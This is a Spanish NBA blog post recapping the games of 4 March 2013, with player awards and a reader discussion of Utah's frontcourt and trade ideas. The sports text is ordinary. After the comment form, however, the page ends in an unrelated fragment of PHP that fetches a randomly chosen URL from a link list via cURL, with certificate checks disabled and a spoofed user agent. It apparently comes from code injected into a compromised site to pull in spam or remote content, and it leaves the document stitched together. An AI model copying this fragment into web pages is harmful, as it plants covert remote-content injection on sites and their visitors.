La Crónica: 15 seguidas… y subiendo

05 de March de 2013 por Simon

Jornada bastante tranquila  en la NBA con 7 partidos en los que apenas había nada en juego. Lo más destacable de la jornada fue la lesión de Carmelo Anthony, una nueva exhibición de Denver en casa y el reencuentro con la victoria de unos Warriors venidos a menos. Por su parte, los Heat alcanzan 15 victorias consecutivas aunque parece que puedan lograr todas las que quieran. Anoche la víctima fueron los Wolves de Ricky Rubio (97-81). Desde muy pronto el partido se rompió y el resultado estuvo siempre en torno a los 10 puntos de ventaja para los campeones que no se vieron necesitados de apretar el acelerador al máximo a pesar de los intentos de la pareja Ricky Rubio – Derrick Williams. En Miami el mejor esta vez fue Wade con 32 puntos, 10 asistencias y 7 rebotes.

New York Knicks venció en Cleveland tras remontar la ventaja de los Cavs en el último cuarto aunque seguro que ningún aficionado disfrutó anoche de la victoria debido a la lesión en el segundo cuarto de Carmelo que, tras un giro feo de su rodilla izquierda, tenía que retirarse del partido. A falta de la confirmación con pruebas diagnósticas más fiables, las primeras exploraciones dicen que no hay nada excesivamente dañado y lo de Carmelo puede quedar en un susto. Volviendo al partido, el primer tiempo fue dominado desde el inicio por unos Cavs que salieron enchufadísimos. Con la baja de Anthony fue Stoudemire  quien se erigió como el líder de Knicks en los últimos minutos y los guió hacia la victoria (102-97). Estuvo bien apoyado por todos sus compañeros de banquillo que anoche se combinaron para anotar 70 de los 102 puntos que anotaron en global los Knicks. Por parte de los Cavs, Speights e Irving firmaron buenos partidos, 23 puntos y 8 rebotes para el interior y 22 puntos 6 asistencias y 5 rebotes para el base All-Star.

 

Denver logró una nueva victoria en su casa, esta vez ante Atlanta Hawks (88-104). Desde el segundo cuarto Denver manejó rentas cómodas a pesar de alguna buena racha de los Hawks. Toda acometida de los de Atlanta era enseguida contrarrestada por la velocidad de ejecución de unos Nuggets que están alcanzando cotas de perfección en este aspecto pues verlos contraatacar con esas combinaciones tan rápidas y precisas, aunque a veces la líen, es impresionante. Lawson sigue con su buen momento de forma y anotó 18 puntos y 8 asistencias para su equipo aunque el máximo anotador esta vez fue Brewer con 22 puntos desde el banquillo. Al Horford fue el mejor “hawk” anoche.

Golden State Warriors aprovechó su vuelta a casa para romper la serie de cuatro derrotas seguidas que había cosechado en su gira por el Este. Ayer ganaron a Toronto Raptors gracias a un impresionante último cuarto en el que los Warriors anotaron 42 puntos (118-125). Ambos equipos no se preocuparon demasiado en todo el partido por la defensa y de ahí este marcador tan alto sin necesidad de prórroga ni nada.  En los Warriors los líderes fueron como siempre, Curry y Lee con 26 y 29 puntos respectivamente, a los que Curry añadió 12 asistencias y Lee 11 rebotes. Landry y Jack aportaron mucho desde el banquillo. En Raptors, Bargniani apareció tras mucho tiempo sin hacerlo  y anotó 26 puntos, los mismos que su compañero Rudy Gay, aunque el mejor Raptors ayer fue Amir Johnson que anotó los 10 lanzamientos que hizo a canasta para terminar con 23 puntos y 15 rebotes el encuentro.  Los Warriors tienen ahora varios partidos seguidos en casa que tendrán que ganar la mayoría si no quieren verse envueltos en la lucha con Houston, Jazz e incluso Lakers.

Ayer los Jazz dieron otro paso atrás en su lucha por escapar de los Lakers y perdieron ante los Bucks, que con 4 victorias seguidas se vuelve a acercar a Boston en la conferencia Este.  Tras una primera parte igualada, Milwaukee consiguió una renta de 10 puntos que parecía que podía darle un final de partido cómodo, pero nada más lejos de la realidad. Utah se rehízo en el último cuarto y llego a tener el partido en su mano pero un gran triple de Jennings igualó el partido a falta de 8 segundos y ni Hayward ni Kanter supieron anotar en la última jugada del tiempo reglamentario. En el extra-time, un triple de Reddick y una gran canasta de Ellis pusieron la ventaja definitiva para los Bucks (108-109).

En el resto de la jornada,  Orlando venció  a New Orleans merced a una buena remontada en el último cuarto que cerró un magnifico último minuto de Afflalo (105-102), y Portland venció al peor equipo de la liga  sin dificultades (105-122) con un buen partido de todos sus titulares  y de Maynor y Leonard desde el banquillo.

PREMIOS

MVP: Esta vez fue Dwyane Wade el que lideró a los Heat en un partido que Lebron se tomó más tranquilamente. El ex de Marquette se fue a los 32 puntos, 7 rebotes y 10 asistencias. Las parejas EllisJennings y CurryLee también estuvieron soberbias.

Rookie: 17 puntos, 15 rebotes y 4 tapones de Anthony Davis contra los 20 puntos, 7 asistencias y 2 robos de Damian Lillard. Meyers Leonard anotó 15 puntos y cogió 6 rebotes.

Sorpresa: Buen partido de Marresse Speights con 23 puntos y 8 rebotes. Andrea Bargnani aportó lo que se espera de un número del draft al anotar 26 puntos.

Decepción: Randy Foye, Gordon Hayward, Marvin Williams y Earl Watson se combinaron para un 3 de 31 en tiros de campo.

Esfuerzo en vano: 23 puntos, 15 rebotes y derrota para Amir Johson y Derrick Favors. La diferencia es que el de los Raptors lo hizo sin fallar ningún tiro a canasta.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

13 comentarios a esta entrada

  1. rumbero dice:
    #1

    Lo del juego interior de Utah es de traca por mucho que nos cansemos de decirlo. Es que ayer Favors se va al banquillo al acabar el tercer cuarto con su 23-15 para no volver en el último ni en la prórroga. Vale que Kanter jugó bien al final y que remontaron la diferencia de +10 aunque acabaran muriendo en la orilla, pero el tio debe llevar un cabreo de la leche si el día que no está Jefferson no pasas de los 30 minutos jugando el partido de tu vida.

      Citar

  2. txusma dice:
    #2

    rumbero:
    Lo del juego interior de Utah es de traca por mucho que nos cansemos de decirlo. Es que ayer Favors se va al banquillo al acabar el tercer cuarto con su 23-15 para no volver en el último ni en la prórroga. Vale que Kanter jugó bien al final y que remontaron la diferencia de +10 aunque acabaran muriendo en la orilla, pero el tio debe llevar un cabreo de la leche si el día que no está Jefferson no pasas de los 30 minutos jugando el partido de tu vida.

    Creo q se han juntado 4 fueras de serie del juego interior. Cada uno de ellos incluso podría ser el referente del juego interior de un equipo. Veremos que hace Utah este verano. No creo que renueve ni a Millsap ni a Jefferson o vete saber si renuevan por ejemplo a Millsap y traspasa a Favors por un escolta o un base de calibre.

      Citar

  3. Ruxixón dice:
    #3

    Si renuevan a ambos es que uno de ellos va a ser traspasado seguro,no creo que otro año más Utah siga en la misma línea de sólo aspirar a entrar en PO.Al Jefferson probablemente sea el sacrificado.

    El este está sentenciado y ya sólo quedan las batallas individuales que no es poco,porque te pueden poner por el lado del cuadro más “feo”.El 2º puesto se lo juegan Indiana/New York,el 8º que te lleva a Miami,Milwaukee/Boston,y las posiciones intermedias Chicago,Brooklyn y Atlanta.

    Comentando el partido de Toronto,Lowry rozando el trlple doble pero con una mala serie en el tiro.Como vengo diciendo no es el base que necesita un equipo que cuenta con DeRozan,Gay y Valenciunas,¿aceptarían los Lakers un intercambio Lowry-Nash?Increible el partido de Amir,tuve que ir a la página de la NBA por si había equivocación,15 rebotes,!!!12 OFENSIVOS!!!!eso unido a su acierto de anoche…qué partidazo se marcó.

      Citar

  4. Denise dice:
    #4

    A Utah le sobran interiores y le faltan exteriores. A Philadelphia le pasa justo lo contrario. Se podrían haber armado un trade entre ellos y ambos habrían salido favorecidos.

      Citar

  5. Heineken dice:
    #5

    De hecho Favors en el primer cuarto acabó con 15 puntos y 9 rebotes.

      Citar

  6. txusma dice:
    #6

    Denise:
    A Utah le sobran interiores y le faltan exteriores. A Philadelphia le pasa justo lo contrario. Se podrían haber armado un trade entre ellos y ambos habrían salido favorecidos.

    Q exterior sobra en Philadelphia que esté a la altura de Jefferson o Millsap?

      Citar

  7. Simon dice:
    #7

    Es que para mi Kanter con minutos, en un par de años estaría en la élite de la liga. Está verde si, pero hace muchisimas cosas bien, que lástima que no le cayera a Cleveland en su momento, pues con el en vez de Tristan Thompson, a parte de tener un futuro mas prometedor, seguro que Kanter hubiera crecido mucho ya. Y de Favors un poco lo mismo…

    Es que todo el mundo venía pidiendo un traspaso por alguno hace ya tiempo. Por ejemplo, para lo que aceptó Thunder yo creo que un Hayward + Kanter/Favors por Harden seguro que hubiera aceptado OKC y con el equipo actual + Harden serían aspirantes a mucho más… por poner un ejemplo. Aunque hubieran tenido que desprenderse de uno de los Internos “viejos” para asi liberar algo de masa salarial, pero aun deshaciendose de Jefferson o Millsap aùn les quedaría otro interno mas para cubrir esa posición con garantias.

      Citar

  8. Denise dice:
    #8

    txusma: Q exterior sobra en Philadelphia que esté a la altura de Jefferson o Millsap?

    Evan Turner por Millsap por ejemplo

      Citar

  9. Simon dice:
    #9

    Evan Turner no es la solución para Utah Jazz

      Citar

  10. Denise dice:
    #10

    Simon: Evan Turner no es la solución para Utah Jazz

    Ya..a ver solo es un ejemplo, lo que Utah necesita es un 2 anotador. Pero no creo que haya uno en el mercado que quiera irse para allá. Quizas podían haber intentado Jefferson por Monta, pero no tengo la certeza que este hubiese renovado por los mormones.

      Citar

  11. safd dice:
    #11

    Sin ser necesariamente directo, buscando un trade con algun exterior de denver (gallo, chandler o alguno de estos) seria una gran solucion a utah (teniendo q sacar algo mas con el nivel de los interiores claro)

    Vaya, a mi me gustaria mucho ver a chandler q es un jugador q me encanta en Utah, hayward+chandler por fuera con un base bueno + el juego interior que tienen y…. chachachannn

      Citar

  12. rumbero dice:
    #12

    txusma: Creo q se han juntado 4 fueras de serie del juego interior. Cada uno de ellos incluso podría ser el referente del juego interior de un equipo. Veremos que hace Utah este verano. No creo que renueve ni a Millsap ni a Jefferson o vete saber si renuevan por ejemplo a Millsap y traspasa a Favors por un escolta o un base de calibre.

    El tema es ese, a saber que acaban haciendo que yo creo que no lo saben ni ellos. Muchos pensábamos que deberían haberse movido en el verano o en este deadline de febrero y míralos. A mi me gusta especialmente Favors y creo que deberían apostar por él, pero precisamente es el más puteado porque a pesar de sus buenos PO de la temporada pasada, de ser un buen defensor y de la progresión que se le supone con 21 años siguen sin darle más minutos.
    Lo de Harden hubiera sido un pelotazo de los buenos en su momento. Ahora veremos que encuentran. No se si los Kings sería un buen sitio donde pescar con Thornton o Evans

      Citar

  13. Esteban dice:
    #13

    kanter seria centro titular y un 10-10 minimo en varios equipos, equipos de PO, warriors y bucks por ejemplo

    jeferson y millsap ya son titulares en un equipo de PO

    y favors es un clon de ibaka,

    mamita q interior

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>